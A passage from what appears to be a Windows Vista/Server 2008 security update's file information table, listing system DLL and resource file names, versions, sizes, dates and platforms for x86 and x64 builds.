applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 07-Nov-2006| 03:40| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:29| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 08-Nov-2006| 07:09| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:22| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 15:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 15:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:32| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:35| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:40| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:35| Not applicable| Not applicable \n \n## \n\n__\n\nFor all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| 
**Platform**| **Service branch** \n---|---|---|---|---|---|--- \nAdvapi32.dll.mui| 6.0.6002.19598| 371,200| 06-Feb-2016| 04:25| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 379,392| 06-Feb-2016| 04:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 376,832| 06-Feb-2016| 04:22| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 373,760| 06-Feb-2016| 04:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 04:44| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 255,488| 06-Feb-2016| 02:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 381,952| 06-Feb-2016| 04:02| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 375,808| 06-Feb-2016| 03:20| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,536| 06-Feb-2016| 03:12| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 366,080| 06-Feb-2016| 03:13| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 383,488| 06-Feb-2016| 05:05| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 380,928| 06-Feb-2016| 03:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 352,768| 06-Feb-2016| 03:55| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 349,696| 06-Feb-2016| 05:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 374,272| 06-Feb-2016| 03:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 380,416| 06-Feb-2016| 04:29| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,536| 06-Feb-2016| 03:07| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 379,392| 06-Feb-2016| 04:33| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 379,904| 06-Feb-2016| 04:41| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,536| 06-Feb-2016| 03:18| Not applicable| Not applicable 
\nAdvapi32.dll.mui| 6.0.6002.19598| 375,296| 06-Feb-2016| 03:14| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 375,296| 06-Feb-2016| 04:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 346,624| 06-Feb-2016| 03:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 338,944| 06-Feb-2016| 04:19| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 371,200| 07-Apr-2017| 17:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 379,392| 07-Apr-2017| 17:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 376,832| 07-Apr-2017| 17:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 373,760| 07-Apr-2017| 17:10| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 17:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 255,488| 07-Apr-2017| 15:52| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 381,952| 07-Apr-2017| 17:12| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 375,808| 07-Apr-2017| 17:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,536| 07-Apr-2017| 17:04| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 366,080| 07-Apr-2017| 17:05| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 383,488| 07-Apr-2017| 17:07| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 380,928| 07-Apr-2017| 17:16| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 352,768| 07-Apr-2017| 17:13| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 349,696| 07-Apr-2017| 17:07| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 374,272| 07-Apr-2017| 17:14| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 380,416| 07-Apr-2017| 17:15| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,536| 07-Apr-2017| 17:06| Not 
applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 379,392| 07-Apr-2017| 17:10| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 379,904| 07-Apr-2017| 17:12| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,536| 07-Apr-2017| 17:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 375,296| 07-Apr-2017| 17:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 375,296| 07-Apr-2017| 17:11| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 346,624| 07-Apr-2017| 17:05| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 338,944| 07-Apr-2017| 17:05| Not applicable| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 1,067,008| 06-Feb-2016| 01:59| x64| Not applicable \nAdvapi32.dll| 6.0.6002.24089| 1,067,520| 07-Apr-2017| 15:42| x64| Not applicable \nOle32.dll| 6.0.6002.19773| 1,910,784| 14-Apr-2017| 20:38| x64| AMD64_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll| 6.0.6002.24089| 1,918,464| 07-Apr-2017| 15:43| x64| AMD64_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.19773| 720,896| 14-Apr-2017| 20:38| x64| AMD64_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.24089| 722,944| 07-Apr-2017| 15:44| x64| AMD64_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Dec-2006| 03:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 16,896| 14-Apr-2017| 21:54| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 08-Jan-2007| 19:56| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 19,968| 14-Apr-2017| 21:50| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 21-Nov-2006| 03:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,992| 14-Apr-2017| 21:47| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 11:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 23,040| 14-Apr-2017| 21:46| Not applicable| Not 
applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Jan-2007| 03:30| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,064| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 11:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 20:38| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 12:57| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,528| 14-Apr-2017| 21:56| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 27-Nov-2006| 21:46| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 19,968| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 12:56| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,064| 14-Apr-2017| 21:55| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 13-Dec-2006| 22:22| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 16,384| 14-Apr-2017| 21:47| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 16-Jan-2007| 03:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,528| 14-Apr-2017| 21:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 23,552| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 11:18| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 13,824| 14-Apr-2017| 21:38| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 07-Nov-2006| 03:51| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 12,800| 14-Apr-2017| 21:44| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 21-Nov-2006| 03:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 
21:47| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 02-Nov-2006| 13:10| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,016| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Dec-2006| 03:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,528| 14-Apr-2017| 21:50| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Nov-2006| 23:06| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,016| 14-Apr-2017| 21:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 18-Jan-2007| 03:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 22,016| 14-Apr-2017| 21:44| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 09-Nov-2006| 03:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 21-Nov-2006| 03:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 19,968| 14-Apr-2017| 21:44| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Jan-2007| 03:35| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 19,456| 14-Apr-2017| 21:47| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 05-Nov-2006| 23:10| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 9,728| 14-Apr-2017| 21:41| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,072| 08-Nov-2006| 07:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 9,728| 14-Apr-2017| 21:52| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:56| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 16,896| 07-Apr-2017| 16:59| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOleres.dll.mui| 
6.0.6002.24089| 19,968| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,992| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:53| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 23,040| 07-Apr-2017| 16:57| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:54| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,064| 07-Apr-2017| 16:57| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 15:44| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 15:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:56| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,528| 07-Apr-2017| 17:00| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 19,968| 07-Apr-2017| 16:58| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,064| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:47| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 16,384| 07-Apr-2017| 16:50| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:47| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,528| 07-Apr-2017| 16:51| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 17:00| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 23,552| 07-Apr-2017| 17:04| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 17:00| Not applicable| Not 
applicable \nOleres.dll.mui| 6.0.6002.24089| 13,824| 07-Apr-2017| 17:03| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:52| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 12,800| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 17:00| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 17:03| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:59| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,016| 07-Apr-2017| 17:03| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,528| 07-Apr-2017| 16:50| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:55| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,016| 07-Apr-2017| 16:58| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:57| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 22,016| 07-Apr-2017| 16:59| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:53| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:56| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:54| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 19,968| 07-Apr-2017| 16:57| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:56| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 19,456| 07-Apr-2017| 16:59| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 16:49| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 9,728| 07-Apr-2017| 16:54| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,072| 07-Apr-2017| 
16:51| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 9,728| 07-Apr-2017| 16:55| Not applicable| Not applicable \nComcat.dll| 6.0.6000.16386| 8,704| 02-Nov-2006| 11:16| x64| Not applicable \nOleres.dll| 6.0.6002.19773| 23,552| 14-Apr-2017| 19:20| x64| Not applicable \nComcat.dll| 6.0.6002.24089| 8,704| 07-Apr-2017| 15:42| x64| Not applicable \nOleres.dll| 6.0.6002.24089| 23,552| 07-Apr-2017| 14:55| x64| Not applicable \nCsrsrv.dll| 6.0.6002.19680| 86,016| 12-Aug-2016| 19:07| x64| Not applicable \nCsrsrv.dll| 6.0.6002.24089| 86,016| 07-Apr-2017| 15:42| x64| Not applicable \nKernel32.dll| 6.0.6002.19623| 1,212,928| 18-Mar-2016| 18:14| x64| Not applicable \nKernel32.dll| 6.0.6002.24089| 1,214,976| 07-Apr-2017| 15:43| x64| Not applicable \nNtdll.dll| 6.0.6002.19623| 1,589,168| 21-Mar-2016| 23:00| x64| Not applicable \nNtdll.dll| 6.0.6002.24089| 1,583,512| 11-Apr-2017| 04:07| x64| Not applicable \nOleaut32.dll| 6.0.6002.19773| 861,696| 14-Apr-2017| 20:38| x64| Not applicable \nOleaut32.dll| 6.0.6002.24089| 862,208| 07-Apr-2017| 15:43| x64| Not applicable \nNtoskrnl.exe| 6.0.6002.19764| 4,693,736| 06-Apr-2017| 16:21| x64| Not applicable \nNtoskrnl.exe| 6.0.6002.24089| 4,665,064| 07-Apr-2017| 15:50| x64| Not applicable \nRpcrt4.dll| 6.0.6002.19598| 1,304,576| 06-Feb-2016| 02:01| x64| Not applicable \nRpcrt4.dll| 6.0.6002.24089| 1,308,160| 07-Apr-2017| 15:44| x64| Not applicable \nSmss.exe| 6.0.6002.19598| 75,264| 06-Feb-2016| 00:48| x64| Not applicable \nSmss.exe| 6.0.6002.24089| 75,776| 07-Apr-2017| 14:43| x64| Not applicable \nNtvdm64.dll| 6.0.6002.19598| 16,896| 06-Feb-2016| 02:01| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64.dll| 6.0.6002.19598| 234,496| 06-Feb-2016| 02:02| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64cpu.dll| 6.0.6002.19598| 17,408| 06-Feb-2016| 02:02| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64win.dll| 6.0.6002.19598| 301,568| 06-Feb-2016| 02:02| x64| AMD64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.24089| 16,896| 07-Apr-2017| 15:43| x64| 
AMD64_MICROSOFT-WINDOWS-WOW \nWow64.dll| 6.0.6002.24089| 234,496| 07-Apr-2017| 15:44| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64cpu.dll| 6.0.6002.24089| 17,408| 07-Apr-2017| 15:44| x64| AMD64_MICROSOFT-WINDOWS-WOW \nWow64win.dll| 6.0.6002.24089| 301,568| 07-Apr-2017| 15:44| x64| AMD64_MICROSOFT-WINDOWS-WOW \nComcat.dll| 6.0.6000.16386| 7,168| 02-Nov-2006| 09:46| x86| Not applicable \nOleres.dll| 6.0.6002.19773| 23,552| 14-Apr-2017| 19:01| x86| Not applicable \nComcat.dll| 6.0.6002.24089| 7,168| 07-Apr-2017| 15:23| x86| Not applicable \nOleres.dll| 6.0.6002.24089| 23,552| 07-Apr-2017| 14:31| x86| Not applicable \nKernel32.dll| 6.0.6002.19623| 861,696| 18-Mar-2016| 17:10| x86| Not applicable \nKernel32.dll| 6.0.6002.24089| 862,720| 07-Apr-2017| 15:25| x86| Not applicable \nNtdll.dll| 6.0.6002.19623| 1,171,488| 21-Mar-2016| 23:00| x86| Not applicable \nNtdll.dll| 6.0.6002.24089| 1,167,880| 11-Apr-2017| 04:07| x86| Not applicable \nOleaut32.dll| 6.0.6002.19773| 574,464| 14-Apr-2017| 20:31| x86| Not applicable \nOleaut32.dll| 6.0.6002.24089| 574,464| 07-Apr-2017| 15:24| x86| Not applicable \nRpcrt4.dll| 6.0.6002.19598| 679,424| 06-Feb-2016| 02:12| x86| Not applicable \nRpcrt4.dll| 6.0.6002.24089| 678,912| 07-Apr-2017| 15:25| x86| Not applicable \nAcwow64.dll| 6.0.6002.19598| 43,008| 06-Feb-2016| 02:11| x86| WOW64_MICROSOFT-WINDOWS-WOW \nInstnm.exe| 6.0.6002.19598| 7,680| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 6.0.6002.19598| 14,336| 06-Feb-2016| 02:12| x86| WOW64_MICROSOFT-WINDOWS-WOW \nSetup16.exe| 3.1.0.1918| 26,112| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nUser.exe| 6.0.6002.19598| 2,560| 06-Feb-2016| 00:32| x86| WOW64_MICROSOFT-WINDOWS-WOW \nWow32.dll| 6.0.6002.19598| 5,120| 06-Feb-2016| 02:12| x86| WOW64_MICROSOFT-WINDOWS-WOW \nAcwow64.dll| 6.0.6002.24089| 43,008| 07-Apr-2017| 15:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nInstnm.exe| 6.0.6002.24089| 7,680| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nNtvdm64.dll| 
6.0.6002.24089| 14,336| 07-Apr-2017| 15:24| x86| WOW64_MICROSOFT-WINDOWS-WOW \nSetup16.exe| 3.1.0.1918| 26,112| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nUser.exe| 6.0.6002.24089| 2,560| 07-Apr-2017| 14:22| x86| WOW64_MICROSOFT-WINDOWS-WOW \nWow32.dll| 6.0.6002.24089| 5,120| 07-Apr-2017| 15:25| x86| WOW64_MICROSOFT-WINDOWS-WOW \nAdvapi32.dll.mui| 6.0.6002.19598| 380,928| 06-Feb-2016| 02:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:12| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:17| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 401,408| 06-Feb-2016| 04:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 266,240| 06-Feb-2016| 02:20| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 02:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 376,832| 06-Feb-2016| 04:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:59| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 03:28| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 04:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 02:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:04| Not applicable| Not applicable \nAdvapi32.dll.mui| 
6.0.6002.19598| 389,120| 06-Feb-2016| 04:14| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 04:58| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:11| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 356,352| 06-Feb-2016| 03:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 348,160| 06-Feb-2016| 04:33| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 380,928| 07-Apr-2017| 16:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:49| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 401,408| 07-Apr-2017| 16:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 266,240| 07-Apr-2017| 15:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:46| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 376,832| 07-Apr-2017| 16:29| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:42| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:37| Not applicable| Not applicable 
\nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:45| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:47| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:59| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:58| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:51| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 